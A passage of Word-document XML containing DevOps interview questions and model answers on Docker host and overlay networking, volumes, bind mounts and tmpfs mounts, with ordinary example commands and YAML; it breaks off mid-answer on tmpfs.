        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Network Interface (eth0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t>No bridge, NAT, or port mapping is involved.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Run a Container in Host Mode</w:t>
        <w:br/>
        <w:t>docker run --network host nginx</w:t>
        <w:br/>
        <w:t>The Nginx service listens directly on the host’s network.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Port Behavior</w:t>
        <w:br/>
        <w:t>Bridge mode:</w:t>
        <w:br/>
        <w:t>docker run -p 8080:80 nginx</w:t>
        <w:br/>
        <w:t>Host mode:</w:t>
        <w:br/>
        <w:t>docker run --network host nginx</w:t>
        <w:br/>
        <w:t>No -p option is needed because the container uses the host’s ports directly.</w:t>
        <w:br/>
        <w:t>If Nginx listens on port 80 inside the container, it is accessible on:</w:t>
        <w:br/>
        <w:t>Host-IP:80</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t>1. Better Performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No NAT</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No bridge traversal</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lower network latency</w:t>
        <w:br/>
        <w:t>2. Simpler Networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Direct access to host interfaces</w:t>
        <w:br/>
        <w:t>3. Useful for High-Performance Applications</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Load balancers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitoring agents</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network appliances</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Packet analyzers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Disadvantages</w:t>
        <w:br/>
        <w:t>1. Reduced Isolation</w:t>
        <w:br/>
        <w:t>Container shares the host network stack.</w:t>
        <w:br/>
        <w:t>Container ↔ Host Network</w:t>
        <w:br/>
        <w:t>Network isolation is lost.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Port Conflicts</w:t>
        <w:br/>
        <w:t>Only one process can bind to a specific port.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Host already using port 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Container cannot use port 80</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Security Risks</w:t>
        <w:br/>
        <w:t>Container gains greater visibility into host networking.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitoring agents (e.g., Prometheus Node Exporter)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network monitoring tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * High-throughput applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Load balancers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Performance-sensitive workloads</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Host Network vs Bridge Network</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Bridge Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>IP Address</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Uses host IP</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate container IP</w:t>
        <w:br/>
        <w:tab/>
        <w:t>NAT</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Port Mapping</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Not required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Slight overhead</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Port Conflicts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Possible</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less common</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Equivalent</w:t>
        <w:br/>
        <w:t>In Kubernetes:</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hostNetwork: true</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  hostNetwork: true</w:t>
        <w:br/>
        <w:t>The Pod shares the node’s network namespace and can access host network interfaces directly.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Host networking is a container networking mode where the container shares the host’s network namespace instead of using a separate network stack. As a result, the container uses the host’s IP address and ports directly, eliminating the need for NAT and port mapping. This provides better network performance and lower latency but reduces isolation and can introduce port conflicts. Host networking is commonly used for monitoring agents, network-intensive applications, and workloads that require direct access to host network interfaces. In Kubernetes, similar behavior can be achieved using the hostNetwork: true setting in a Pod specification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q357. What is overlay networking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Overlay Networking?</w:t>
        <w:br/>
        <w:t>Overlay Networking is a networking mechanism that enables containers or Pods running on different hosts (nodes) to communicate as if they were on the same network.</w:t>
        <w:br/>
        <w:t>It creates a virtual network on top of the physical network, abstracting the underlying infrastructure.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need Overlay Networks?</w:t>
        <w:br/>
        <w:t>Imagine:</w:t>
        <w:br/>
        <w:t>Node 1                    Node 2</w:t>
        <w:br/>
        <w:t>-------                   -------</w:t>
        <w:br/>
        <w:t>Container A               Container B</w:t>
        <w:br/>
        <w:t>10.0.1.2                  10.0.2.3</w:t>
        <w:br/>
        <w:t>Normally, containers on different hosts cannot directly communicate using private container IPs.</w:t>
        <w:br/>
        <w:t>An overlay network provides a virtual network:</w:t>
        <w:br/>
        <w:t>Container A (10.244.1.2)</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve">     Overlay Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▲</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t>Container B (10.244.2.3)</w:t>
        <w:br/>
        <w:t>Now they communicate seamlessly across hosts.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>+--------------------+</w:t>
        <w:br/>
        <w:t>| Container A        |</w:t>
        <w:br/>
        <w:t>+--------------------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t>+--------------------+</w:t>
        <w:br/>
        <w:t>| Overlay Network    |</w:t>
        <w:br/>
        <w:t>+--------------------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▲</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t>+--------------------+</w:t>
        <w:br/>
        <w:t>| Container B        |</w:t>
        <w:br/>
        <w:t>+--------------------+</w:t>
        <w:br/>
        <w:t>Underneath:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Virtual Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>VXLAN Tunnel</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Physical Network</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How It Works</w:t>
        <w:br/>
        <w:t>Overlay networks typically use tunneling technologies such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * VXLAN (Virtual Extensible LAN)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GRE</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * IP-in-IP</w:t>
        <w:br/>
        <w:t>Packet flow:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Encapsulate Packet</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>VXLAN Tunnel</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Physical Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Decapsulate Packet</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t>To applications, communication appears to occur on the same network.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Swarm Example</w:t>
        <w:br/>
        <w:t>Create overlay network:</w:t>
        <w:br/>
        <w:t>docker network create \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --driver overlay \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  my-overlay-network</w:t>
        <w:br/>
        <w:t>Deploy services:</w:t>
        <w:br/>
        <w:t>docker service create \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --network my-overlay-network nginx</w:t>
        <w:br/>
        <w:t>Containers on different Swarm nodes can communicate through the overlay network.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes and Overlay Networking</w:t>
        <w:br/>
        <w:t>Most Kubernetes CNI solutions implement overlay networking.</w:t>
        <w:br/>
        <w:t>Common examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Flannel</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Calico</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cilium</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Weave Net</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Node 1</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Pod A (10.244.1.5)</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Node 2</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Pod B (10.244.2.7)</w:t>
        <w:br/>
        <w:t>Pods communicate directly using Pod IPs despite being on different nodes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t>✅ Multi-host communication</w:t>
        <w:br/>
        <w:t>✅ Simplifies distributed applications</w:t>
        <w:br/>
        <w:t>✅ Supports Kubernetes and Docker Swarm</w:t>
        <w:br/>
        <w:t>✅ Network abstraction from physical infrastructure</w:t>
        <w:br/>
        <w:t>✅ Easy scaling across nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Disadvantages</w:t>
        <w:br/>
        <w:t>❌ Additional encapsulation overhead</w:t>
        <w:br/>
        <w:t>❌ Slightly higher latency</w:t>
        <w:br/>
        <w:t>❌ More complex troubleshooting</w:t>
        <w:br/>
        <w:t>❌ Increased network packet size (MTU considerations)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Overlay vs Bridge Network</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Bridge Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Overlay Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Single Host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multiple Hosts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Communication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Same machine only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cross-node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Slight overhead</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use Case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Local containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Distributed workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes Usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Overlay networking is a virtual networking model that enables containers or Kubernetes Pods running on different hosts to communicate over a logical network. It creates a software-defined network on top of the physical infrastructure using encapsulation technologies such as VXLAN. Overlay networks abstract the underlying network topology and provide seamless cross-node connectivity, which is essential for distributed container orchestration platforms like Kubernetes and Docker Swarm. While overlay networking introduces some encapsulation overhead, it greatly simplifies multi-node communication and cluster scalability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q358. Explain Docker volumes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Docker Volumes?</w:t>
        <w:br/>
        <w:t>Docker Volumes are the preferred mechanism for persisting data generated and used by containers.</w:t>
        <w:br/>
        <w:t>Normally, when a container is deleted, all data stored in its writable layer is lost. Volumes allow data to survive container restarts, recreations, and upgrades.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need Volumes?</w:t>
        <w:br/>
        <w:t>Without a volume:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Database Data</w:t>
        <w:br/>
        <w:t>If the container is removed:</w:t>
        <w:br/>
        <w:t>docker rm mysql-container</w:t>
        <w:br/>
        <w:t>All data is lost.</w:t>
        <w:br/>
        <w:t>With a volume:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Docker Volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Persistent Storage</w:t>
        <w:br/>
        <w:t>Data remains even if the container is deleted.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Create a Volume</w:t>
        <w:br/>
        <w:t>docker volume create mysql-data</w:t>
        <w:br/>
        <w:t>List volumes:</w:t>
        <w:br/>
        <w:t>docker volume ls</w:t>
        <w:br/>
        <w:t>Inspect volume:</w:t>
        <w:br/>
        <w:t>docker volume inspect mysql-data</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use a Volume</w:t>
        <w:br/>
        <w:t>docker run -d \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --name mysql \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v mysql-data:/var/lib/mysql \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql:8</w:t>
        <w:br/>
        <w:t>Here:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * mysql-data → Docker volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * /var/lib/mysql → Container path</w:t>
        <w:br/>
        <w:t>Database files are stored in the volume.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Volume Lifecycle</w:t>
        <w:br/>
        <w:t>Create Volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Attach to Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Container Stops</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Container Deleted</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Volume Still Exists</w:t>
        <w:br/>
        <w:t>Volumes are independent of container lifecycle.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Docker Storage</w:t>
        <w:br/>
        <w:t>1. Volumes (Recommended)</w:t>
        <w:br/>
        <w:t>-v myvolume:/data</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Managed by Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Best performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy backup and migration</w:t>
        <w:br/>
        <w:t>2. Bind Mounts</w:t>
        <w:br/>
        <w:t>-v /host/data:/data</w:t>
        <w:br/>
        <w:t>Maps a host directory directly into the container.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Host: /app/logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Container: /logs</w:t>
        <w:br/>
        <w:t>3. tmpfs Mounts</w:t>
        <w:br/>
        <w:t>--tmpfs /data</w:t>
        <w:br/>
        <w:t>Stored only in memory and removed when the container stops.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Compose Example</w:t>
        <w:br/>
        <w:t>version: "3.9"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: mysql:8</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - mysql-data:/var/lib/mysql</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql-data:</w:t>
        <w:br/>
        <w:t>Start:</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Databases (MySQL, PostgreSQL, MongoDB)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shared data between containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Backups</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Persistent configuration files</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Volume vs Bind Mount</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Volume</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Bind Mount</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed by Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Depends on host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Portability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host Path Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended for Production</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usually No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Backup a Volume</w:t>
        <w:br/>
        <w:t>docker run --rm \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v mysql-data:/data \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v $(pwd):/backup \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ubuntu tar czf /backup/mysql-backup.tar.gz /data</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker volumes are persistent storage mechanisms that exist independently of container lifecycles. They are used to retain application data even when containers are stopped, recreated, or deleted. Volumes are managed by Docker, provide better portability and performance than bind mounts, and are commonly used for databases, logs, and shared application data. In production environments, volumes are often backed by network-attached or cloud storage and integrated with orchestration platforms such as Kubernetes through Persistent Volumes and Persistent Volume Claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q359. What are bind mounts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Bind Mounts?</w:t>
        <w:br/>
        <w:t>A bind mount maps a file or directory from the host machine directly into a container.</w:t>
        <w:br/>
        <w:t>This allows the container to access and modify files on the host filesystem.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Host directory:</w:t>
        <w:br/>
        <w:t>/home/akhilesh/app</w:t>
        <w:br/>
        <w:t>Container directory:</w:t>
        <w:br/>
        <w:t>/app</w:t>
        <w:br/>
        <w:t>Run container:</w:t>
        <w:br/>
        <w:t>docker run -v /home/akhilesh/app:/app nginx</w:t>
        <w:br/>
        <w:t>Architecture:</w:t>
        <w:br/>
        <w:t>Host</w:t>
        <w:br/>
        <w:t>└── /home/akhilesh/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>└── /app</w:t>
        <w:br/>
        <w:t>Any file changes on the host are immediately visible inside the container, and vice versa.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use Cases</w:t>
        <w:br/>
        <w:t>1. Local Development</w:t>
        <w:br/>
        <w:t>docker run -v $(pwd):/app node:20</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Edit code on your laptop.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container sees changes instantly.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No need to rebuild the image.</w:t>
        <w:br/>
        <w:t>2. Configuration Files</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>-v /etc/nginx/nginx.conf:/etc/nginx/nginx.conf \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>3. Log Sharing</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>-v /var/log/myapp:/logs \</w:t>
        <w:br/>
        <w:t>myapp</w:t>
        <w:br/>
        <w:t>Logs are stored directly on the host.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Read-Only Bind Mount</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>-v /host/config:/app/config:ro \</w:t>
        <w:br/>
        <w:t>myapp</w:t>
        <w:br/>
        <w:t>ro = Read Only</w:t>
        <w:br/>
        <w:t>The container can read files but cannot modify them.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Bind Mount vs Volume</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Bind Mount</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker Volume</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Storage Location</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host filesystem</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker-managed storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed By</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Portability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host Path Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Development Use</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Excellent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Good</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production Use</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy access to host files</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Real-time synchronization</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Great for development</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Useful for configs and logs</w:t>
        <w:br/>
        <w:t>Disadvantages</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Depends on host directory structure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Less portable</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Potential security risks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Harder to migrate across servers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Bind mounts are a Docker storage mechanism that maps a specific file or directory from the host machine into a container. Unlike Docker volumes, bind mounts are managed by the host filesystem and require an explicit host path. They are commonly used in development environments for source code sharing, configuration management, and log collection. While bind mounts offer flexibility and real-time synchronization, they reduce portability and are generally less suitable than Docker volumes for production persistent storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q360. Explain tmpfs mounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are tmpfs Mounts?</w:t>
        <w:br/>
        <w:t>A tmpfs mount is a Docker storage mechanism that stores data only in the host’s memory (RAM) instead of writing it to disk.</w:t>
        <w:br/>
